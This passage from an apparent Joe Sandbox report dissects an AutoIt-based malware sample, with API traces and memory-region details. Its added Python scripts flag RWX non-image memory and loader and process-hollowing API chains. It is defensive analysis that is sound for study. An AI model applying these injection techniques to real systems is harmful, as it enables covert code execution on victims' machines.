                                                                                                               • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                               • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                              • String ID: #$0$AutoIt v3
                                                                                                              • API String ID: 423443420-4155596026
                                                                                                              • Opcode ID: 6d485580cd90e631e4caf8e83af83ca5594a0337a00cc80cd1d8731289750756
                                                                                                              • Instruction ID: c7fc292d4f38b8d939ffb4665cf3a856622b3b27dd8611a44d2964d2f41d5c1d
                                                                                                              • Opcode Fuzzy Hash: 6d485580cd90e631e4caf8e83af83ca5594a0337a00cc80cd1d8731289750756
                                                                                                              • Instruction Fuzzy Hash: A32162B4E04314ABCB01DFA9EC49A9ABFF5FB4D310F00423AE204A72B1D7B546408F99

                                                                                                              Control-flow Graph

                                                                                                               Control-flow graph (rendered image; legend: Executed / Not Executed). Entry block d785b0-d7865e. Blocks with API calls: d78665-d7868b CreateFileW; d786a9-d786c3 VirtualAlloc; d786ca-d786e1 ReadFile; d786e8-d78728 VirtualAlloc; d787b0-d787b4 CloseHandle; d787c0-d787cb VirtualFree; d7889c-d788a7 VirtualFree. Block d787ce-d787d7 branches back to d78665, so the open/allocate/read sequence runs in a loop. Internal calls: d794c0, d79710, d79520. Edge list omitted.
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00D78681
                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00D788A7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileFreeVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 204039940-0
                                                                                                              • Opcode ID: 82da6562ea58e1e6a493f370b5b44df79f1e69436ef7e6b8db348b6991eb573a
                                                                                                              • Instruction ID: be5a4fcca6f4cbf9766182dc817bc59681b9926e4e54ec3f894ca12b32d8fee7
                                                                                                              • Opcode Fuzzy Hash: 82da6562ea58e1e6a493f370b5b44df79f1e69436ef7e6b8db348b6991eb573a
                                                                                                              • Instruction Fuzzy Hash: 06A12D74E40209EBDB14CFA4C898BEEBBB5FF48304F248159E115BB280DB759A41DFA5
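                                                                                                               The function above is the one dump source on this page that is not tied to a loaded module: its region 00D76000 carries protection 00000040 (PAGE_EXECUTE_READWRITE) and type 00020000 (MEM_PRIVATE) and is marked "based on PE: false", whereas every dump under 003E0000 is MEM_IMAGE (01000000) with PAGE_EXECUTE_READ (00000020) or lower. Decoding the CreateFileW arguments shown in the APIs list gives GENERIC_READ (80000000), FILE_SHARE_READ|WRITE|DELETE (00000007), OPEN_EXISTING (00000003) and FILE_ATTRIBUTE_NORMAL (00000080); the VirtualFree call passes MEM_RELEASE (00008000). Together with the VirtualAlloc and ReadFile blocks in the graph, that is a file being read into freshly allocated memory from code that itself lives in private RWX memory. The script below is an added triage example, not Joe Sandbox code: it parses the dotted .sdmp identifiers quoted on this page and flags executable regions that are not image-backed. The field positions are inferred from this report (an assumption); only the protection and region-type fields are interpreted, and their values match the Windows PAGE_* and MEM_* constants on every dump line here. The "based on PE" value for the associated 003E0000 dumps is taken from their source line.

```python
"""Triage Joe Sandbox memory-dump identifiers (the *.sdmp names in the
"Memory Dump Source" lines) and flag regions that look like unpacked or
injected code.  Added example; not Joe Sandbox code.

Assumption: the dotted field layout is inferred from this report.  Only
field 5 (PAGE_* protection) and field 7 (MEM_* region type) are decoded;
both match the documented Windows constants on every line of this page.
"""
import re
from dataclasses import dataclass

# winnt.h memory protection constants
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PROTECT_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# MEMORY_BASIC_INFORMATION.Type values
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
TYPE_NAMES = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

# <f1>.<f2>.<decimal>.<16-hex base>.<protect>.<f6>.<type>.<f8>.sdmp  (layout assumed)
_SDMP = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int          # field 4: region base address
    protect: int       # field 5: PAGE_* protection
    mem_type: int      # field 7: MEM_* region type
    pe_backed: bool    # the report's "based on PE" flag for the dump

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXECUTE_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    def verdict(self) -> str:
        """Code executing from memory the loader did not map as an image
        (private or mapped, or not backed by a PE) is the usual footprint of
        an unpacked stage or of process injection."""
        if self.executable and (self.mem_type != MEM_IMAGE or not self.pe_backed):
            return "suspicious: executable region not backed by a loaded image"
        if self.executable and self.writable:
            return "suspicious: writable+executable image region"
        return "expected"


def parse_sdmp(name: str, pe_backed: bool) -> DumpRegion:
    m = _SDMP.match(name)
    if not m:
        raise ValueError(f"not an sdmp identifier: {name!r}")
    return DumpRegion(
        name=name,
        base=int(m.group(4), 16),
        protect=int(m.group(5), 16),
        mem_type=int(m.group(7), 16),
        pe_backed=pe_backed,
    )


def triage(entries):
    """entries: iterable of (sdmp name, based_on_pe) -> list of summary rows."""
    rows = []
    for name, pe_backed in entries:
        r = parse_sdmp(name, pe_backed)
        rows.append((
            f"{r.base:#x}",
            PROTECT_NAMES.get(r.protect, f"{r.protect:#x}"),
            TYPE_NAMES.get(r.mem_type, f"{r.mem_type:#x}"),
            r.verdict(),
        ))
    return rows


# Constructed input: dump identifiers quoted on this page, paired with the
# "based on PE" value of the source line they are listed under.
SAMPLES = [
    ("00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp", False),
]

if __name__ == "__main__":
    for row in triage(SAMPLES):
        print(*row)
```

Only the 00D76000 entry is flagged; the three image-backed dumps come out as expected. In a real pass the same filter runs over every "Memory Dump Source" line of the report, and any flagged region is the one to carve and scan first.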

                                                                                                              Control-flow Graph

                                                                                                               Control-flow graph (rendered image; legend: Executed / Not Executed). Entry block 3e49fb-3e4a25 RegOpenKeyExW. Blocks with API calls: 4541cc-4541e3 RegQueryValueExW; 4541e5-454222 RegQueryValueExW; 454246-45424f RegCloseKey. Internal calls: 3ebcce, 3ff4ea, 3e47b7, 3e6a63, 3e47e2. Edge list omitted.
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003E4A1D
                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004541DB
                                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0045421A
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00454249
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue$CloseOpen
                                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                              • API String ID: 1586453840-614718249
                                                                                                              • Opcode ID: 7a3bbf183740324a6aaf23959ec8b712b89aada29eecba882f15324eb92971f9
                                                                                                              • Instruction ID: 88b4c7d71637551247635cf78b650aa52aee70e4606c7507c91629e31b21906b
                                                                                                              • Opcode Fuzzy Hash: 7a3bbf183740324a6aaf23959ec8b712b89aada29eecba882f15324eb92971f9
                                                                                                              • Instruction Fuzzy Hash: 99116D71A00118BEEB01ABA4CD86EFF7BBCEF04358F104069F506D6191EA749E45DB54

Control-flow Graph
control_flow_graph nodes:
• 1156: 3e36b8-3e3728, CreateWindowExW * 2, ShowWindow * 2
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003E36E6
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003E3707
• ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E371B
• ShowWindow.USER32(00000000,?,?,?,?,003E3AA3,?), ref: 003E3724
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 60a9fa4a5b945901ed37ac037668e198766777ee3b795ab1966d8689bbbce163
• Instruction ID: b4304d23f78a1c7e56b5565ed5ed98a2828c6108f475fa27796c4d657fdf80d3
• Opcode Fuzzy Hash: 60a9fa4a5b945901ed37ac037668e198766777ee3b795ab1966d8689bbbce163
• Instruction Fuzzy Hash: D8F0DA71A482E07AE7315757AC48E673E7DEBC7F20F00402FFA08A25B0D6650895DAB9

Control-flow Graph
control_flow_graph nodes:
• 1261: d78350-d784ae, call d78240, CreateFileW
• 1267: d784b5-d784c5
• 1268: d784b0
• 1271: d784c7
• 1272: d784cc-d784e6, VirtualAlloc
• 1269: d78565-d7856a
• 1273: d784ea-d78501, ReadFile
• 1274: d784e8
• 1275: d78505-d7853f, call d78280, call d77240
• 1276: d78503
• 1281: d78541-d78556, call d782d0
• 1282: d7855b-d78563, ExitProcess
control_flow_graph edges: 1261->1267, 1261->1268, 1267->1271, 1267->1272, 1268->1269, 1271->1269, 1272->1273, 1272->1274, 1273->1275, 1273->1276, 1274->1269, 1275->1281, 1275->1282, 1276->1269, 1281->1282, 1282->1269
APIs
  • Part of subcall function 00D78240: Sleep.KERNELBASE(000001F4), ref: 00D78251
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D784A4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
Similarity
• API ID: CreateFileSleep
• String ID: YYIACMSJTEUBL1B3AF17QR
• API String ID: 2694422964-3274283272
• Opcode ID: 1ab6724357998d6cbfb880048ecdbbbbf36b50f31c725e11b999389b61cdc8f0
• Instruction ID: 23ebb4acda9bc37b2208527ffcbf6d1ff13e119a7b16b55a97501da733c54303
• Opcode Fuzzy Hash: 1ab6724357998d6cbfb880048ecdbbbbf36b50f31c725e11b999389b61cdc8f0
• Instruction Fuzzy Hash: AF619330D04248DAEF11DBF4D848BEEBB75AF19304F144199E249BB2C1DABA5B44CBB5
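The entry above is the kind of record worth triaging automatically: the function lives in a memory dump the report marks "based on PE: false" (the 0xD76000 region, so code that was written into memory rather than mapped from the executable on disk), and its graph dump shows CreateFileW, VirtualAlloc and ReadFile in sequence even though the "APIs" bullets resolve only the CreateFileW site. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses the text layout of these per-function entries (the control_flow_graph dump, the "APIs" bullets including "Part of subcall function" entries, and the "Source File ... based on PE:" line), merges API names from the bullets and the graph, and flags functions that run from non-PE-backed memory or that contain an API set typical of a next-stage loader or of a process-hollowing prologue. The two chain definitions are this example's own heuristics; the sample excerpt is constructed from lines that appear in this report (the graph line is abridged), so it runs offline.

```python
"""Flag loader / injection API chains in Joe Sandbox per-function entries.

Added example, not part of the Joe Sandbox report. It consumes the text form
of the report's "control_flow_graph ...", "APIs" and "Memory Dump Source"
lines; the chain definitions below are this example's own heuristics.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# "• CreateFileW.KERNELBASE(?,80000000,...), ref: 00D784A4" or CRT entries such as
# "• _wcscat.LIBCMT ref: 00452D80"; nested calls carry a "Part of subcall function" prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z0-9_@]+)\.(?P<module>[A-Za-z0-9]+)(?:\(| ref:)"
)
# "• Source File: ....sdmp, Offset: 00D76000, based on PE: false"
SOURCE_LINE = re.compile(
    r"Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
# Graph tokens are node ids, hex ranges, "call <addr>" and API names; an API
# name is the only token that starts upper-case and contains a lower-case letter.
CFG_LINE = re.compile(r"^\s*control_flow_graph\b(?P<body>.*)")
CFG_API = re.compile(r"\b[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*\b")


@dataclass
class FunctionBlock:
    offset: str = ""                  # base of the memory dump the function lives in
    pe_backed: Optional[bool] = None  # None when no "Memory Dump Source" line was seen
    direct_apis: Set[str] = field(default_factory=set)   # "APIs" bullets at this site
    subcall_apis: Set[str] = field(default_factory=set)  # "Part of subcall function" bullets
    cfg_apis: Set[str] = field(default_factory=set)      # names only visible in the graph dump

    def called(self) -> Set[str]:
        return self.direct_apis | self.cfg_apis


@dataclass
class Finding:
    offset: str
    apis: List[str]
    reasons: List[str]


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the report text into per-function entries; the Source File line closes one."""
    blocks, cur = [], FunctionBlock()
    for line in text.splitlines():
        m = CFG_LINE.match(line)
        if m:
            cur.cfg_apis.update(CFG_API.findall(m.group("body")))
            continue
        m = API_LINE.match(line)
        if m:
            (cur.subcall_apis if m.group("sub") else cur.direct_apis).add(m.group("name"))
            continue
        m = SOURCE_LINE.search(line)
        if m:
            cur.offset, cur.pe_backed = m.group("offset"), m.group("pe") == "true"
            blocks.append(cur)
            cur = FunctionBlock()
    if cur.called() or cur.subcall_apis:   # trailing entry without a Source File line
        blocks.append(cur)
    return blocks


# Heuristic chains (this example's own): every API must appear in the function's
# direct calls or in its graph dump. Subcalls are kept separate on purpose.
CHAINS = {
    "reads a file into freshly allocated memory (next-stage loader pattern)":
        {"CreateFileW", "VirtualAlloc", "ReadFile"},
    "creates a child process and inspects its thread context and memory (process-hollowing prologue)":
        {"CreateProcessW", "Wow64GetThreadContext", "ReadProcessMemory"},
}


def analyze(blocks: List[FunctionBlock]) -> List[Finding]:
    findings = []
    for b in blocks:
        called, reasons = b.called(), []
        if b.pe_backed is False and called:
            reasons.append("Windows API called from memory not backed by a PE image")
        for label, needed in CHAINS.items():
            if needed <= called:
                reasons.append(label)
        if reasons:
            findings.append(Finding(b.offset, sorted(called), reasons))
    return findings


def scan_report(text: str) -> List[Finding]:
    return analyze(parse_blocks(text))


# Constructed excerpt in the report's layout: API and Source File lines are copied
# from this report's entries, the graph line is abridged to the API-bearing nodes.
SAMPLE = r"""Control-flow Graph
control_flow_graph 1261 d78350-d784ae call d78240 CreateFileW 1267 d784b5-d784c5 1261->1267 1272 d784cc-d784e6 VirtualAlloc 1267->1272 1273 d784ea-d78501 ReadFile 1272->1273 1282 d7855b-d78563 ExitProcess 1273->1282
APIs
  • Part of subcall function 00D78240: Sleep.KERNELBASE(000001F4), ref: 00D78251
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D784A4
Memory Dump Source
• Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003E4A1D
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004541DB
• RegCloseKey.ADVAPI32(?), ref: 00454249
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00D779FB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D77A91
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D77AB3
Memory Dump Source
• Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
"""

if __name__ == "__main__":
    for f in scan_report(SAMPLE):
        print(f"function in dump at {f.offset}: {', '.join(f.apis)}")
        for r in f.reasons:
            print(f"  - {r}")
```

On the sample, the AutoIt runtime's registry lookup from the PE-backed 0x3E0000 image produces no finding, while both 0xD76000 entries are flagged twice: once for running from non-image-backed memory and once for the matching chain. Merging the graph tokens with the "APIs" bullets matters; with the bullets alone the loader pattern would not be visible, because the report resolved only the CreateFileW site in that function.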

Control-flow Graph
APIs
  • Part of subcall function 003E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004A1148,?,003E61FF,?,00000000,00000001,00000000), ref: 003E5392
  • Part of subcall function 003E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 003E4A1D
• _wcscat.LIBCMT ref: 00452D80
• _wcscat.LIBCMT ref: 00452DB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: _wcscat$FileModuleNameOpen
• String ID: 8!J$\$\Include\
• API String ID: 3592542968-4002809495
• Opcode ID: 1af749cc03b1d5154051bb787ebc6252170975090a8e369344190c70ffcadb61
• Instruction ID: 83d057fd7bf0ec62d8d2e130b6c98d305d619e3603d3cf542a157460a1d1a6b4
• Opcode Fuzzy Hash: 1af749cc03b1d5154051bb787ebc6252170975090a8e369344190c70ffcadb61
• Instruction Fuzzy Hash: E251A5714143908FC705EF5ADA8189BBBF4FF5A300B40453FF649972A1EBB49508DB5A
APIs
  • Part of subcall function 003E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003E39FE,?,00000001), ref: 003E41DB
• _free.LIBCMT ref: 004536B7
• _free.LIBCMT ref: 004536FE
  • Part of subcall function 003EC833: __wsplitpath.LIBCMT ref: 003EC93E
  • Part of subcall function 003EC833: _wcscpy.LIBCMT ref: 003EC953
  • Part of subcall function 003EC833: _wcscat.LIBCMT ref: 003EC968
  • Part of subcall function 003EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 003EC978
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
• API String ID: 805182592-1757145024
• Opcode ID: 6ba411a27ec193a9a23a8a3481b06fc0cb3d3f8ff2f8bcde771dc7fc8f6fa74f
• Instruction ID: 3afaf3a71a712893630be1b00d166f93466d48e129b953e3bbbac952e048240c
• Opcode Fuzzy Hash: 6ba411a27ec193a9a23a8a3481b06fc0cb3d3f8ff2f8bcde771dc7fc8f6fa74f
• Instruction Fuzzy Hash: BC91C331910269AFCF05EFA5CC519EEB7B4BF08351F10452EF816AB292DB38AA05CB54
APIs
• _memset.LIBCMT ref: 00453725
• GetOpenFileNameW.COMDLG32 ref: 0045376F
  • Part of subcall function 003E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003E53B1,?,?,003E61FF,?,00000000,00000001,00000000), ref: 003E662F
  • Part of subcall function 003E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003E40C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X$t3I
• API String ID: 3777226403-1233262582
• Opcode ID: 1928d50ce760156a300c65640c0deebb1ff0e47c81f1eb265d2e3d8d77fb03a8
• Instruction ID: e05fcf1bd3d5ca0409f883c139f47d44a62b45f04af68994d352450a80f32270
• Opcode Fuzzy Hash: 1928d50ce760156a300c65640c0deebb1ff0e47c81f1eb265d2e3d8d77fb03a8
• Instruction Fuzzy Hash: 5921A871A101989FCF12DFD5C8457DEBBFC9F59305F00806AE405BB281DBB85A898F65
APIs
• __getstream.LIBCMT ref: 004034FE
  • Part of subcall function 00407C0E: __getptd_noexit.LIBCMT ref: 00407C0E
• @_EH4_CallFilterFunc@8.LIBCMT ref: 00403539
• __wopenfile.LIBCMT ref: 00403549
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
• String ID: <G
• API String ID: 1820251861-2138716496
• Opcode ID: 6b0d09551894233ee89a4a03cd0dfaa1efab98ee1259bbae01a9a6b1c5346864
• Instruction ID: cd341fc58a287b5cc306137432472ec8f93a1700eff075165262910b85afd943
• Opcode Fuzzy Hash: 6b0d09551894233ee89a4a03cd0dfaa1efab98ee1259bbae01a9a6b1c5346864
• Instruction Fuzzy Hash: FD112E70D00205AADB11BF728C0166F3AA85F45354B15893BE415FB2C1EB3CCA1197A9
APIs
• RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003FD28B,SwapMouseButtons,00000004,?), ref: 003FD2BC
• RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003FD28B,SwapMouseButtons,00000004,?,?,?,?,003FC865), ref: 003FD2DD
• RegCloseKey.KERNELBASE(00000000,?,?,003FD28B,SwapMouseButtons,00000004,?,?,?,?,003FC865), ref: 003FD2FF
Strings
Memory Dump Source
• Source File: 00000000.00000002.2062177554.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
• Associated: 00000000.00000002.2062150007.00000000003E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: Control Panel\Mouse
• API String ID: 3677997916-824357125
• Opcode ID: 6d15d9b52747a2452b25f11cb15572c1b29b52d31fed3f5bd0ae833912fa6563
• Instruction ID: a10bc0a03254713dad21ba604cd7983813ae03da0977f8bcdd93f5c86438ab51
• Opcode Fuzzy Hash: 6d15d9b52747a2452b25f11cb15572c1b29b52d31fed3f5bd0ae833912fa6563
• Instruction Fuzzy Hash: 6E115A75A1120CBFDB128F64DC88EBE7BBDEF04744B00482AEA01D7120E7719E409B65
                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D779FB
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D77A91
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D77AB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2063345059.0000000000D76000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D76000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_d76000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 2438371351-0
                                                                                                              • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                              • Instruction ID: dd2ae358a27502cc787b5391b8fd973b055a4e7e717797fb12f3231e00252c6d
